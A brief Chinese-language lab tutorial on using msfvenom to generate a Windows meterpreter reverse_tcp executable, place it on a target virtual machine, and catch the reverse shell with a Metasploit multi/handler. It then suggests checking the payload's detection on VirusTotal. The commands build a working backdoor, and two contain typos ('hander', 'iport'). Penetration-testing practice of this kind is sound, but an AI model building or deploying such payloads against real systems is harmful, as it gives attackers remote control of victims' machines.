Msfvenom
用到参数-p、-f 、-o
1.-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe
2.–o /root/payload.exe -p, –payload Payload to use;指定哪些有效载荷生成
(本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序)
3.-f, –format Output format;指定有效载荷的格式
(本例中 exe 生成Windows系统的可执行文件)
4.-o, –out Save the payload;指定保存位置
(本例中 /root/payload.exe)
5.lhost是指定逆向连接的IP地址,定位计算机
6.iport是指定逆向连接的端口
打开kali,在终端中输入
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=虚拟机ip lport=5000 -f exe -o /var/payload.exe
出现以下界面
右键在root管理权限下找到exe文件位置
复制exe文件到靶机桌面上
kali中启动主控端
输入msfconsole
在msf6下输入以下5条命令
use exploit/multi/hander
set payload windows/meterpreter/reverse_tcp
set lhost 虚拟机ip
set lport 5000
exploit
将exe文件拖到主机桌面,再网站中测评生成的被控端
https://www.virustotal.com/gui/home/upload